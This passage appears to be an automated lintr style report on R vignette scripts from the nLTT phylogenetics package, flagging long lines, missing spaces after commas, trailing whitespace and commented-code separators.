^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:43:53:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L43) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 2\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:45:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L45) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:50:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L50) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:53:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L53) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:61:41:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L61) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:65:42:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L65) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L68) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:68:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:68:129:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:72:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:72:102:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:75:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L75) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L77) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:82:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L82) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:86:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L86) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:89:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L89) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:93:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L93) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:95:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L95) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:97:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L97) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:100:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L100) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:104:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L104) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:105:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L105) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:108:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L108) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​t <- nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:112:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L112) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:116:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L116) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:41:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commas should always have a space after.**\n```r\n​t <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.2)\n                                        ^\n```\n[inst/doc/vignette_get_nltt_values.R:120:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L120) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:42:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commas should always have a space after.**\n```r\n​df <- nLTT::get_nltt_values(c(phylogeny1,phylogeny2), dt = 0.01)\n                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:123:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L123) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L124) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:124:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:124:129:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L128) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:128:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:128:102:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:131:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L131) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:140:53:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:143:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L143) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:147:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L147) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L148) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:148:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:148:129:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L148) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:54:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:102:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:154:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L154) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:2:9:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## 